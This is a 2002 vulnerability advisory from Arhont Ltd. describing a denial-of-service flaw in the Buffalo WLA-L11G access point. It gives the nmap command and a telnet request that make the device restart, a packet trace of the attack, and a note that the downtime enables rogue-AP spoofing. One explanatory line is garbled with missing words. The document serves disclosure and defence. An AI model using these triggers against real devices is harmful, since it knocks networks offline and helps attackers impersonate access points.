
Buffalo AP Denial of Service

by Nikola Strahija on November 14th, 2002

While performing network testing, we found a Buffalo Access Point (WLA-L11G Ver.2.31) vulnerable to a Denial of Service (DoS) attack. Simply running a network scanning tool such as nmap (www.insecure.org) with version grabbing against the AP, in the following manner, restarts it:


$ nmap -sVVV -p 80 192.168.177.250

where 192.168.177.250 is the IP address of the Buffalo AP.

Analysing the network traffic during the scan shows the following:

14:16:14.622714 192.168.177.7.34968 > 192.168.177.250.www: S [tcp sum ok] 4001152576:4001152576(0) win 5840 <mss 1460,sackOK,timestamp 5143788 0,nop,wscale 0> (DF) [tos 0x10] (ttl 64, id 49836, len 60)
0x0000  4510 003c c2ac 4000 4006 5bad c0a8 4d07  E..<..@.@.[...M.
0x0010  c0a8 4dfa 8898 0050 ee7c be40 0000 0000  ..M....P.|.@....
0x0020  a002 16d0 6204 0000 0204 05b4 0402 080a  ....b...........
0x0030  004e 7cec 0000 0000 0103 0300            .N|.........

14:16:14.623498 192.168.177.250.www > 192.168.177.7.34968: S [tcp sum ok] 51008176:51008176(0) ack 4001152577 win 16000 <mss 1460> (ttl 30, id 2, len 44)
0x0000  4500 002c 0002 0000 1e06 8078 c0a8 4dfa  E..,.......x..M.
0x0010  c0a8 4d07 0050 8898 030a 52b0 ee7c be41  ..M..P....R..|.A
0x0020  6012 3e80 b1e2 0000 0204 05b4 0000       `.>...........

14:16:14.623539 192.168.177.7.34968 > 192.168.177.250.www: . [tcp sum ok] 1:1(0) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49837, len 40)
0x0000  4510 0028 c2ad 4000 4006 5bc0 c0a8 4d07  E..(..@.@.[...M.
0x0010  c0a8 4dfa 8898 0050 ee7c be41 030a 52b1  ..M....P.|.A..R.
0x0020  5010 16d0 f14f 0000                      P....O..

14:16:15.402518 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 1:7(6) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49838, len 46)
0x0000  4510 002e c2ae 4000 4006 5bb9 c0a8 4d07  E.....@.@.[...M.
0x0010  c0a8 4dfa 8898 0050 ee7c be41 030a 52b1  ..M....P.|.A..R.
0x0020  5018 16d0 08b2 0000 6765 7420 0d0a       P.......get...

14:16:15.647578 192.168.177.250.www > 192.168.177.7.34968: . [tcp sum ok] 1:1(0) ack 7 win 16000 (ttl 30, id 3, len 40)
0x0000  4500 0028 0003 0000 1e06 807b c0a8 4dfa  E..(.......{..M.
0x0010  c0a8 4d07 0050 8898 030a 52b1 ee7c be47  ..M..P....R..|.G
0x0020  5010 3e80 c999 0000 0000 0000 0000       P.>...........

14:16:15.647639 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49839, len 42)
0x0000  4510 002a c2af 4000 4006 5bbc c0a8 4d07  E..*..@.@.[...M.
0x0010  c0a8 4dfa 8898 0050 ee7c be47 030a 52b1  ..M....P.|.G..R.
0x0020  5018 16d0 e435 0000 0d0a                 P....5....

14:16:16.358599 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49840, len 42)
0x0000  4510 002a c2b0 4000 4006 5bbb c0a8 4d07  E..*..@.@.[...M.
0x0010  c0a8 4dfa 8898 0050 ee7c be47 030a 52b1  ..M....P.|.G..R.
0x0020  5018 16d0 e435 0000 0d0a                 P....5....

14:16:17.750198 arp who-has 192.168.177.250 tell 192.168.177.250
0x0000  0001 0800 0604 0001 0007 4006 0656 c0a8  ..........@..V..
0x0010  4dfa 0000 0000 0000 c0a8 4dfa 0000 0000  M.........M.....
0x0020  0000 0000 0000 0000 0000 0000 0000       ..............

14:16:17.798596 192.168.177.7.34968 > 192.168.177.250.www: P [tcp sum ok] 7:9(2) ack 1 win 5840 (DF) [tos 0x10] (ttl 64, id 49841, len 42)
0x0000  4510 002a c2b1 4000 4006 5bba c0a8 4d07  E..*..@.@.[...M.
0x0010  c0a8 4dfa 8898 0050 ee7c be47 030a 52b1  ..M....P.|.G..R.
0x0020  5018 16d0 e435 0000 0d0a                 P....5....

14:16:20.274463 arp who-has 192.168.177.7 tell 192.168.177.250
0x0000  0001 0800 0604 0001 0007 4006 0656 c0a8  ..........@..V..
0x0010  4dfa 0000 0000 0000 c0a8 4d07 0000 0000  M.........M.....
0x0020  0000 0000 0000 0000 0000 0000 0000       ..............

14:16:20.274488 arp reply 192.168.177.7 is-at 0:4:5a:63:a4:be
0x0000  0001 0800 0604 0002 0004 5a63 a4be c0a8  ..........Zc....
0x0010  4d07 0007 4006 0656 c0a8 4dfa            M...@..V..M.

14:16:20.275495 192.168.177.250.www > 192.168.177.7.34968: FR [tcp sum ok] 51008177:51008177(0) win 0 (ttl 30, id 1, len 40)
0x0000  4500 0028 0001 0000 1e06 807d c0a8 4dfa  E..(.......}..M.
0x0010  c0a8 4d07 0050 8898 030a 52b1 0000 0000  ..M..P....R.....
0x0020  5005 0000 b4e9 0000 0000 0000 0000       P.............


The attack can also be reproduced manually via telnet:

$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
GET / HTTP/1.0



Connection closed by foreign host.

and

$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
get

Connection closed by foreign host.

(where, there is a after get; without the
, the AP doesn't restart)

Impact: An attacker can use this vulnerability to restart the AP at will. This is useful if the attacker has changed the AP's configuration and a restart is required for the changes to take effect. It can also be used to spoof the AP: while the legitimate AP is down (roughly five seconds in the trace above, from its last acknowledgement at 14:16:15.6 to the RST at 14:16:20.3), clients can be made to associate with a rogue or spoofed AP instead of the legitimate one.

Risk Factor: Medium/High

According to Arhont Ltd. policy, all vulnerabilities and security issues found are reported to
the manufacturer 7 days before release to the public
domain (such as CERT and BUGTRAQ).

If you would like more information about this
issue, please do not hesitate to contact the Arhont team.


Regards,

Andrei Mikhailovsky
Arhont Ltd.
http://www.arhont.com
GnuPG Keyserver: blackhole.pca.dfn.de
GnuPG Key: 0x178F548C

